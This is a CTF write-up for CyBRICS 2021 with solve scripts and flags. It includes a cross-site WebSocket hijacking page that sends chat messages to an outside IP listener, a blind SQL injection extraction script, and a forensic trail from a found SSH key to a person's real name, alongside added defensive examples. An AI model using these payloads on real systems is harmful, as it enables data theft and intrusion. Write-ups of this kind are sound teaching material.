7th XCTF & CyBRICS CTF 2021

Web

Ad Network

Author: Alexander Menshchikov (@n0str)

We are so tired of advertising on the internet. It feels like it breaks the internet. Try to follow the ad, try to follow its rules.

There is a flag 1337 redirects deep into the network...

The /adnetwork endpoint issues a chain of redirects, roughly 1337 of them. The following script follows them to reach the flag.

<?php

use GuzzleHttp\Client;

require '../vendor/autoload.php';
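$URL = "http://adnetwork-cybrics2021.ctf.su/adnetwork";

// Automatic redirects are disabled so that every hop's body can be read and printed.
$client = new Client(array(
    "timeout" => 15,
    "allow_redirects" => false,
    "verify" => false // TLS certificate verification is turned off
));

for($i = 0; $i < 1338; $i++){
    try{
        $response = $client->get($URL, array(
            // Requests are sent through a local proxy.
            'proxy' => array(
                'http' => '127.0.0.1:7890',
                'https' => '127.0.0.1:7890'
            )
        ));
    }catch(Exception $e){
        // The request failed: retry the same hop.
        echo "[i--] $e";
        $i--;
        continue;
    }
    $content = $response->getBody()->getContents();
    // The body is an HTML link to the next hop; strip the markup around the href value.
    $URL = str_replace("\">See Other</a>.\n\n", "", str_replace("<a href=\"", "", $content));
    echo "[$i] " . $URL . PHP_EOL;
    echo $content . PHP_EOL;
}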
cybrics{f0lL0w_RUl3Z_F0ll0W_r3d1r3C7z}

Multichat

Author: Alexander Menshchikov (@n0str)

Yet another chat-messenger with rooms support! Free to use. Convince the admin that its code is insecure.

Tip: Admin and tech support are members of a secret chat room. Tech support can ask admin to tell him the flag, to do that tech support writes him a message (in a chat): "Hey, i forgot the flag. Can you remind me?". Then admin will tell him the flag.

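A WebSocket-based chat room. According to the challenge description, the flag is delivered as soon as the tech-support user sends the specified string to the admin. Port 5000 hosts a page for reporting a URL, so all that is needed is a front-end page that performs CSRF.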

<!DOCTYPE html>
<html>
    <body>
        <script>
            const socket = new WebSocket("ws://multichat-cybrics2021.ctf.su/ws");

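            // Once the socket is open, send the message the admin responds to.
            socket.onopen = function(e){
                socket.send("Hey, i forgot the flag. Can you remind me?");
            }
            // Forward every received chat message, base64-encoded, to the listener.
            socket.onmessage = function(e){
                var exportFlag = new XMLHttpRequest();
                exportFlag.open('get', 'http://8.136.8.210:3255/flagis-' + window.btoa(e.data));
                exportFlag.send();
            }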
        </script>
    </body>
</html>

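Host the page on your own server and submit its URL to the target; the listening port then receives the following response.

Decoding the exfiltrated data gives the following.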

Sure, dude. The flag is cybrics{Pwn3d_CR055_51t3_W3850CK3t_h1jACK1n9}
cybrics{Pwn3d_CR055_51t3_W3850CK3t_h1jACK1n9}
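
Cross-site WebSocket hijacking of this kind succeeds when the server accepts the handshake without checking which site opened the socket. The following is an added example, not part of the original writeup or the challenge's code, of an Origin allowlist check run before the upgrade is accepted; the allowlist, function names and sample handshakes are constructed for illustration.

```python
from urllib.parse import urlsplit

# Assumption: the one site whose pages may open chat sockets (constructed value).
ALLOWED_ORIGINS = {"http://multichat-cybrics2021.ctf.su"}
DEFAULT_PORTS = {"http": 80, "https": 443}


def normalize_origin(value):
    """Parse a serialized Origin header into (scheme, host, port), or None."""
    if not value or value == "null":  # "null" comes from sandboxed/opaque contexts
        return None
    try:
        parts = urlsplit(value)
        port = parts.port  # raises ValueError on a malformed port
    except ValueError:
        return None
    scheme = parts.scheme.lower()
    if scheme not in DEFAULT_PORTS or not parts.hostname:
        return None
    # A real Origin is scheme://host[:port] with nothing else attached.
    if parts.path or parts.query or parts.fragment or parts.username is not None:
        return None
    if port is None:
        port = DEFAULT_PORTS[scheme]
    return (scheme, parts.hostname.lower(), port)


# Compare parsed tuples, never substrings, so look-alike hosts cannot match.
ALLOWED = {normalize_origin(o) for o in ALLOWED_ORIGINS}


def check_handshake(headers):
    """Return (status, reason) for the headers of a WebSocket upgrade request."""
    h = {k.lower(): v for k, v in headers.items()}
    if h.get("upgrade", "").lower() != "websocket":
        return 400, "not a websocket upgrade"
    origin = normalize_origin(h.get("origin"))
    if origin is None:
        # Browsers always send Origin on WebSocket handshakes; rejecting its
        # absence is a policy choice that also shuts out non-browser clients.
        return 403, "missing or opaque Origin"
    if origin not in ALLOWED:
        return 403, "cross-site Origin"
    return 101, "ok"


# Constructed sample handshakes (only the headers relevant to the check).
SAMPLES = {
    "same_site": {"Upgrade": "websocket",
                  "Origin": "http://multichat-cybrics2021.ctf.su"},
    "explicit_port": {"Upgrade": "websocket",
                      "Origin": "http://MULTICHAT-cybrics2021.ctf.su:80"},
    "other_site": {"Upgrade": "websocket",
                   "Origin": "http://attacker.example"},
    "lookalike": {"Upgrade": "websocket",
                  "Origin": "http://multichat-cybrics2021.ctf.su.attacker.example"},
    "scheme_mismatch": {"Upgrade": "websocket",
                        "Origin": "https://multichat-cybrics2021.ctf.su"},
    "sandboxed": {"Upgrade": "websocket", "Origin": "null"},
    "no_origin": {"Upgrade": "websocket"},
}

if __name__ == "__main__":
    for name, headers in SAMPLES.items():
        print(f"{name:16} {check_handshake(headers)}")
```

The Origin check protects browser users only, since a non-browser client can send any header it likes; authentication of the socket itself is a separate control.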

Announcement

Author: Alexander Menshchikov (@n0str)

Ladies and gentlemen!

Allow us to introduce a brand new project — ⚐ The Flag

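The submitted parameters are vulnerable to SQL injection; the value of the digest parameter must be the MD5 of email.

A script builds error-based logic to perform blind injection.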

<?php

use GuzzleHttp\Client;

require '../vendor/autoload.php';
$URL = "http://announcement-cybrics2021.ctf.su/";
//$statement = "select database()"; //announcement
//$statement = "select group_concat(table_name) from information_schema.tables where table_schema=database()"; //emails,logs
//$statement = "select group_concat(column_name) from information_schema.columns where table_schema=database()"; //email,id,timestamp,log
$statement = "select group_concat(log) from announcement.logs"; //flag
$text = "";

$client = new Client(array(
    "timeout" => 5,
    "allow_redirects" => false,
    "verify" => false
));

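// Recover the query result one character at a time (up to 100 characters).
for($count = 1; $count <= 100; $count++){
    // Binary search over the printable ASCII range.
    $low = 32;
    $high = 126;
    while($low <= $high){
        $mid = (int)(($low + $high) / 2);
        // If the comparison is true, IF returns 1; otherwise cot(0) raises a database error.
        $sql = "' or if((ascii(substr(({$statement}),{$count},1)) > {$mid}),1,cot(0)), NOW()) #";
        $response = $client->post($URL, array(
            'proxy' => array(
                'http' => '127.0.0.1:7890',
                'https' => '127.0.0.1:7890'
            ),
            'form_params' => array(
                "email" => $sql,
                // The server requires digest to be the MD5 of email.
                "digest" => md5($sql)
            )
        ));
        $content = $response->getBody()->getContents();
        // An error mentioning "cot" means the comparison was false: the character code is <= $mid.
        if(stristr($content, "cot")){
            $high = $mid - 1;
        }else{
            $low = $mid + 1;
        }
    }
    echo $count . PHP_EOL;
    // When the search ends, $low == $high + 1, so this expression equals $low, the character code.
    $text .= chr((int)(($high + $low + 1) / 2));
    echo $text . PHP_EOL;
}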
cybrics{1N53r7_0ld_900d_5ql}
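
The injection point and the digest check described above, rebuilt as an added example (not the challenge's code, which the writeup does not show): a string-built INSERT that returns database errors to the client, beside a parameterized version with a generic error. SQLite stands in for the challenge's database, and the table layout, function names and sample inputs are constructed; the second input is modelled on the shape of the payload in the script above.

```python
import hashlib
import sqlite3


def md5_hex(text):
    return hashlib.md5(text.encode()).hexdigest()


def make_db():
    """In-memory stand-in for the emails table (assumed layout)."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE emails (id INTEGER PRIMARY KEY, email TEXT, timestamp TEXT)"
    )
    return db


def digest_ok(email, digest):
    # Both values come from the client, so this only proves the client can
    # compute MD5. It places no constraint on what email contains.
    return md5_hex(email) == digest


def subscribe_vulnerable(db, email, digest):
    """Weak form: input concatenated into the INSERT, error text returned."""
    if not digest_ok(email, digest):
        return "bad digest"
    sql = (
        "INSERT INTO emails (email, timestamp) "
        f"VALUES ('{email}', datetime('now'))"
    )
    try:
        db.execute(sql)
    except sqlite3.Error as exc:
        # Returning the database error gives the client a true/false signal,
        # which is what error-based blind injection relies on.
        return f"sql error: {exc}"
    return "ok"


def subscribe_safe(db, email, digest):
    """Hardened form: bound parameter, generic error message."""
    if not digest_ok(email, digest):
        return "bad digest"
    try:
        db.execute(
            "INSERT INTO emails (email, timestamp) VALUES (?, datetime('now'))",
            (email,),
        )
    except sqlite3.Error:
        return "error"  # details belong in server-side logs, not the response
    return "ok"


def stored_emails(db):
    return [row[0] for row in db.execute("SELECT email FROM emails ORDER BY id")]


# Constructed inputs: a legitimate address containing a quote, and a value
# that closes the string literal and rewrites the rest of the VALUES list.
APOSTROPHE = "o'brien@example.com"
BREAKOUT = "' or 1, datetime('now')) --"

if __name__ == "__main__":
    for handler in (subscribe_vulnerable, subscribe_safe):
        db = make_db()
        for value in (APOSTROPHE, BREAKOUT):
            print(handler.__name__, repr(value), "->",
                  handler(db, value, md5_hex(value)))
        print(handler.__name__, "stored:", stored_emails(db))
```

With the string-built statement the quote in a legitimate address surfaces as a database error and the second input is evaluated as SQL; with the bound parameter both inputs are stored verbatim.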

Cyber

Mic Check

cybrics{Th1S_i5_T3h_R34l_m1C_ch3CK_f1A6}

rebyC

Scanner

Author: Mikhail Driagunov (@aethereternity)

Check out this cool new game!

I heard they serve flags at level 5.

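Solve the first four easy levels in turn. Level 5 presents a scrolling QR code. First split the GIF into frames with GIF Splitter, then write a script to reassemble the code.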

from PIL import Image

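ny = 0  # vertical offset of the next strip in the output image
newImage = Image.new("RGB", (989, 162), "white")
# Take every third frame and stack the 6-pixel-high strip cropped from each one.
for x in range(8, 145, 3):
    print("./gif/IMG00%03d.bmp" % x)
    image = Image.open(("./gif/IMG00%03d.bmp" % x))
    strip = image.crop((46, 496, 1036, 502))
    newImage.paste(strip, (0, ny))
    ny += 6
# Stretch the result to a square so that it can be scanned as a QR code.
newImage = newImage.resize((500, 500))
newImage.save("this.png")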

Scanning the QR code yields the flag.

cybrics{N0w_Y0u_4r3_4_c4sh13r_LOL}

CAPTCHA The Flag

Author: Vlad Roskov (@mrvos)

Guessing challenges? On my CyBRICS? It’s more likely than you think.

Prove you’re a true CTFer!

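A mini-game of filling in CAPTCHAs; the CAPTCHA only becomes visible once the image's colours are decomposed. The following interactive script solves it.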

import httpx as requests
import numpy as np
from PIL import Image

# bit planes codes are from https://medium.com/@stephanie.werli/image-steganography-with-python-83381475da57
# Interactive Script

session = requests.Client(proxies={
    "http://": "http://127.0.0.1:7890",
    "https://": "http://127.0.0.1:7890",
})
while True:
    image = session.get("https://captf-cybrics2021.ctf.su/captcha.php").content
    with open("./tmp.png", "wb") as file:
        file.write(image)

    data = np.array(Image.open("./tmp.png", "r"))
    out = []
    # Extract the eight bit planes, most significant first, and show them side by side.
    for k in range(7, -1, -1):
        res = data // 2 ** k & 1
        out.append(res * 255)
    b = np.hstack(out)
    Image.fromarray(b).show()

    captcha = input("Enter the captcha you have seen in the window:")
    try:
        response = session.post("https://captf-cybrics2021.ctf.su/", data={"answer": captcha})
    except Exception:
        print("[*] Submission failed.")
        continue
    print(f"[+] Submitted {captcha} with response {response.content.decode()}")

cybrics{a_k33n_Ey3_wi11_sp0T_r1GhT_aw4Y}

Network

LX-100

Author: Vlad Roskov (@mrvos)

We were sitting at an SPbCTF meetup and tried to sniff some Wi-Fi traffic. Lol imagine, they have a DSLR camera that can broadcast a Wi-Fi access point.

Anyway, we were discussing CyBRICS flags there, hope there’s no way to leak them.

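Open the capture in Wireshark and follow UDP stream 4 to obtain an MJPEG video stream. After exporting it and changing the file extension to MJPEG, play it in VLC Media Player to get the following image containing the flag.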

cybrics{Lost_Secrets_In_The_Air}

ASCII Terminal

Author: Artur Khanov (@awengar)

you have an ASCII terminal. It really works, check with the id command

A terminal that executes ASCII art as commands. The ASCII art is 30 lines long and is terminated by a "." on a line of its own.

https://www.text-image.com/convert/ascii.html

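Create the image below in PowerPoint, generate ASCII art from it with the site above, then post-process it slightly to obtain the following payload. Because l was frequently misrecognized, it was removed; and because a considerable number of characters are not allowed, the characters in the generated ASCII art were replaced with plain asterisks and dots.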

...............................................................................................................................................................................
...............................................................................................................................................................................
...............................................................................................................................................................................
...............................................................................................................................................................................
...............................................................................................................................................................................
...............................................................................................................................................................................
...............................................................................................................................***::::**..............***......................
........................................................................*.*..................................................************............****......................
......................................................................:****................................................**************.......:*....***.....**...............
......................................................................*****...............................................******...............****:*.***..******..............
......................................................................*****...............................................*****...............*******************..............
......................:***********........*************:*.......*********************.....................................*****...................*:*******:*..................
..................*:**************........*****************.....*********************..............................*********************.......*****************...............
..................******:.....*:*:........*****..**..******......********************..............................**********************......******************..............
.................******................................*****..........*****........................................*********************.......:***...***...****...............
................*****...........................***********...........*****...............................................*****......................****......................
...............******.......................***************...........*****...............................................*****......................****......................
...............******.....................*****************...........*****...............................................*****................................................
................****:...................******.........****...........*****...............................................*****................................................
................******..................*****..........****...........*****...............................................*****................................................
.................******:.******.:*......*****:**.**.*******...........******.********.....................................*****................................................
..................:***************.......******************............**************.....................................*****................................................
.....................************..........**********..:****............*:***********.....................................****:................................................
...............................................*...............................................................................................................................
...............................................................................................................................................................................
...............................................................................................................................................................................
...............................................................................................................................................................................
...............................................................................................................................................................................
...............................................................................................................................................................................
...............................................................................................................................................................................
.

Sending the payload produces the following response.

........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
..........................%@,...............%@,.......................+#@;?@@@@@@@@@@#..,?@@#*.....?@@@@@@%...?@@@@@@%...,?@@#*....*@@@@@@@#%:........?@;......:?#@@$+...,@@@@@@@@@;................,@*.....?@@@@@@%................:*$@@#%;......,*#@#*.....,*#@#*....*@@@@@@#?:...?@$:................................................................................................................................................................................................................................................
..........................%@,...............%@,......................,@@@;?@@@@@@@@@@#.,#@@@@@%....$@@@@@@%...$@@@@@@%..,#@@@@@%...*@@@@@@@@@@:......:@@;.....?@@@@@@@%..,@@@@@@@@@:...............,$@*.....$@@@@@@%...............+@@@@@@@@?.....%@@@@@%....%@@@@@%...*@@@@@@@@@;..?@@$................................................................................................................................................................................................................................................
..........................%@,........................................+@?,......#@,.....*@%:,;@@;...@#.........@#........*@%:,;@@;..*@*....,;$@$.....,#@@;....*@@*:,,+@@?........*@?...............,$@@*.....@#....................;@@%;,,:*@@+...;@#;,;#@;..;@#;,;#@;..*@*...,:%@@:..,#@................................................................................................................................................................................................................................................
..........................%@,........................................*@;.......#@,.....#@,...+@*..,@%........,@%........#@,...+@*..*@*......,@@.....*@$@;...:@@;.....:@@,......:@$...............+@@$@*....,@%...................,@@*......;@$...%@;...;@%..%@;...;@%..*@*......%@%...?@,...............................................................................................................................................................................................................................................
.......,?#@#*..*@+....,@%.%@,?@@%:...%#:#@%.%@,..,?#@#*....*#@@$;....*@;.......#@,...........*@+..;@*........;@*..............*@+..*@*......,@@....:@??@;...?@?.......?%:......$@;...............##;;@*....;@*...................+@$........?*...@@.....@@..@@.....@@..*@*......,@@...?@,...............................................................................................................................................................................................................................................
......,#@@@@@?.,@$....*@;.%@%@@@@@:..%##@@?.%@,.,#@@@@@?..?@@@@@@;...*@:.......#@,.........,+@#,..*@*%@@%:...*@*%@@%:.......,+@#,..*@*....,;$@%....$#,?@;...$@:...............+@%................;..;@*....*@*%@@%:..............%@+............,@$.....$@,,@$.....$@,.*@*.......$@:..?@:...............................................................................................................................................................................................................................................
......?@$;,;#@:.$@,...$@..%@@+,:$@%..%@#:...%@,.?@$;,;#@:,@#:,,+@$...?@:.......#@,........?@@#:...?@@@@@@@:..?@@@@@@@:.....?@@#:...*@@@@@@@@@@:...*@;.?@;...@@,...............#@:...................;@*....?@@@@@@@:.............#@,............,@%.....%@:,@%.....%@:.*@*.......%@;..*@;...............................................................................................................................................................................................................................................
......@@,...;@*.+@*..,@?..%@+...,@@,.%@+....%@,.@@,...;@*,@#;.......;@#........#@,........?#@@#:..$@*,,:$@#..$@*,,:$@#.....?#@@#:..*@@@@@@@#?:...:@%..?@;...@@...............;@%....................;@*....$@*,,:$@#.............@@,....$@@@@@;.:@%.....%@::@%.....%@:.*@*.......?@+..:@$:..............................................................................................................................................................................................................................................
.....:@$........,@#..*@;..%@,....%@;.%@:....%@,:@$........$@@@$*,..*@#:........#@,..........,?@$........,#@:.......,#@:......,?@$..*@*..,?@%,....$#,..?@;...#@,..............%@;....................;@*..........,#@:............#@,....$@@@@@;.:@%.....%@,:@%.....%@,.*@*.......%@;...+@@,.............................................................................................................................................................................................................................................
.....:@%.........%@:.$#...%@.....?@;.%@,....%@,:@%........,%@@@@@+.*@$:........#@,............#@,........%@;........%@;........#@,.*@*....?@%...*@;...?@;...$@;.......:;,...,@#.....................;@*...........%@;............$@;........?@;.,@$.....$@,,@$.....$@,.*@*.......#@:...+@@,.............................................................................................................................................................................................................................................
.....:@$.........;@*,@?...%@,....%@:.%@,....%@,:@$..........,+%#@@,.;@$........#@,............$@:........%@;........%@;........$@:.*@*....,#@*..$@@@@@@@@@:.*@?.......?@*...;@?.....................;@*...........%@;............+@%........?@;..@@.....@@..@@.....@@..*@*......,@@...,@#:..............................................................................................................................................................................................................................................
......@@,...,@%...##*@:...%@;...,@@,.%@,....%@,.@@,...,@%.......$@:..%@,.......#@,....,@#....,@@,,@#....,@@,,@#....,@@,,@#....,@@,.*@*.....;@@:.$@@@@@@@@@:.:@@:.....;@@:...?@;.....................;@*...,@#....,@@,............,@@*.......%@;..%@;...;@%..%@;...;@%..*@*......%@?...+@;...............................................................................................................................................................................................................................................
......%@$:,:$@+...*@@#....%@@;,:$@%..%@,....%@,.%@$:,:$@+:@$:,,;#@,..*@:.......#@,.....$@%:,;$@%..$@%:,;$@%..$@%:,;$@%..$@%:,;$@%..*@*......%@%.......?@;....?@@*:,:*@@?....$@,.....................;@*....$@%:,;$@%..............;@@%;,,:+#@@;..;@#;,;#@;..;@#;,;#@;..*@*...,;%@@:...?@:...............................................................................................................................................................................................................................................
......,#@@@@@%....,@@*....%@%@@@@#,..%@,....%@,.,#@@@@@%..%@@@@@@?...*@;.......#@,.....:@@@@@@#,..:@@@@@@#,..:@@@@@@#,..:@@@@@@#,..*@*......,@@;......?@;.....%@@@@@@@%,....@@......................;@*....:@@@@@@#,...............+@@@@@@@@#;....%@@@@@%....%@@@@@%...*@@@@@@@@@;....?@,...............................................................................................................................................................................................................................................
.......,?#@#?,.....#@:....%@,%@@%,...%@,....%@,..,?#@#?,..,*#@@$+....*@;.......#@,......:%@@#?,....:%@@#?,....:%@@#?,....:%@@#?,...*@*.......*@#,.....?@;......;%#@@$+......@#......................;@*.....:%@@#?,.................,*$@@#%+......,*#@#*,....,*#@#*,...*@@@@@@#?:.....?@,...............................................................................................................................................................................................................................................
..................,@$................................................+@;..............................................................................................................................................................................................................?@,...............................................................................................................................................................................................................................................
................,,%@+................................................;@?,............................................................................................................................................................................................................,#@................................................................................................................................................................................................................................................
................#@@#.................................................,@@@;.........................................................................................................;@@@@@@@@@@@+....................;@@@@@@@@@@@+...................................................?@@%................................................................................................................................................................................................................................................
................%@$,..................................................+#@;.........................................................................................................;@@@@@@@@@@@+....................;@@@@@@@@@@@+...................................................?@$,................................................................................................................................................................................................................................................
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
cybrics{T3553R4C7_15_G00D}

Forensic

Namecheck

Author: Alexander Menshchikov (@n0str)

We have got the home folder from a criminal’s computer. Try to find his/her real name.

Flag format in uppercase: LASTNAME FIRSTNAME (ex: IVANOV IVAN)

The attachment includes a Bash history file:

git add *
git commit -m "instagram filter"
git push origin main
rm *
ls -la
rm -rf .git

The .ssh folder also contains a private key, so we try connecting to GitHub with it and get the following response.

PTY allocation request failed on channel 0
Hi poggersdog12! You've successfully authenticated, but GitHub does not provide shell access.
Connection to github.com closed.

This gives us the person's GitHub ID: poggersdog12

https://gist.github.com/thewoolleyman/2294542455a8e673e0a844362e0b8bac#file-github-graphql-commits-by-ref

Slightly modifying the GraphQL query from the reference above reveals an email address: vividcoala@localhost.com

The earlier commit message mentions Instagram, so we try visiting vividcoala's Instagram account. An airline ticket can be found in the filter, and scanning it with Read My Boarding Pass gives the following.

DIVOV NIKOLAI
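
The scanner output above is the passenger-name field of the ticket's barcode. The following is an added example, not part of the original write-up: assuming the barcode uses the IATA BCBP fixed-width layout, it parses a constructed sample string and shows which other fields a photographed boarding pass exposes. The names `parse_bcbp`, `flag_name`, `exposed_fields` and `SAMPLE_BCBP` are hypothetical, and every sample value except the passenger name is made up.

```python
# Added example: fixed-width parser for the mandatory section of an IATA BCBP
# boarding-pass barcode string (layout assumed; the write-up only names the tool).
FIELDS = [  # (field name, width in characters)
    ("format_code", 1), ("legs", 1), ("passenger_name", 20), ("eticket", 1),
    ("pnr", 7), ("from_airport", 3), ("to_airport", 3), ("carrier", 3),
    ("flight_number", 5), ("julian_date", 3), ("compartment", 1),
    ("seat", 4), ("sequence", 5), ("passenger_status", 1), ("var_size_hex", 2),
]
MANDATORY_LEN = sum(width for _, width in FIELDS)  # 60 characters

# Constructed sample: only the passenger name comes from the write-up;
# booking reference, route, flight and seat are made up.
SAMPLE_BCBP = (
    "M1" + "DIVOV/NIKOLAI".ljust(20) + "E" + "ABC123".ljust(7)
    + "SVO" + "LED" + "SU".ljust(3) + "0006".ljust(5) + "204"
    + "Y" + "012A" + "0042".ljust(5) + "1" + "00"
)

def parse_bcbp(raw):
    """Split the mandatory section into named fields; reject malformed input."""
    if len(raw) < MANDATORY_LEN:
        raise ValueError("shorter than the 60-character mandatory section")
    if raw[0] != "M":
        raise ValueError("unexpected format code %r" % raw[0])
    fields, pos = {}, 0
    for name, width in FIELDS:
        fields[name] = raw[pos:pos + width].strip()
        pos += width
    # The last mandatory field gives the size (hex) of the optional section.
    if len(raw) < MANDATORY_LEN + int(fields["var_size_hex"], 16):
        raise ValueError("optional section is truncated")
    return fields

def flag_name(raw):
    """Return the name as 'LASTNAME FIRSTNAME', the challenge's flag format."""
    last, _, first = parse_bcbp(raw)["passenger_name"].partition("/")
    return ("%s %s" % (last, first)).strip().upper()

def exposed_fields(raw):
    """Everything besides the name that a photographed barcode gives away."""
    parsed = parse_bcbp(raw)
    keys = ("pnr", "from_airport", "to_airport", "carrier", "flight_number", "seat")
    return {k: parsed[k] for k in keys}

if __name__ == "__main__":
    print(flag_name(SAMPLE_BCBP))
    print(exposed_fields(SAMPLE_BCBP))
```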

Recording

Author: Mikhail Driagunov (@aethereternity)

I’ve found a strange recording.

What does it hide?

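Open the MRF file with Macro Recorder. Set both the system language and the Firefox language to English; only then do the window titles match those in the recording. Arrange the Start menu tiles according to Firefox's position, and set up a page for a locked Pastebin paste in Firefox.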

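Create a new recording configured with the window size from the original recording, then play it; the on-screen keyboard window is resized and moved to the preset position.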

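Disable mouse clicks and play the provided recording, then map the recorded pointer paths across the virtual keyboard, for both passes, to their keys to recover the typed input. After filling in the gaps, we get the following.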

https://pastebin.com/uzqCjFUa
9yDz5iZprd

Decrypting the Pastebin paste with the password yields the flag.

cybrics{m4cr0_rulz_w000t}
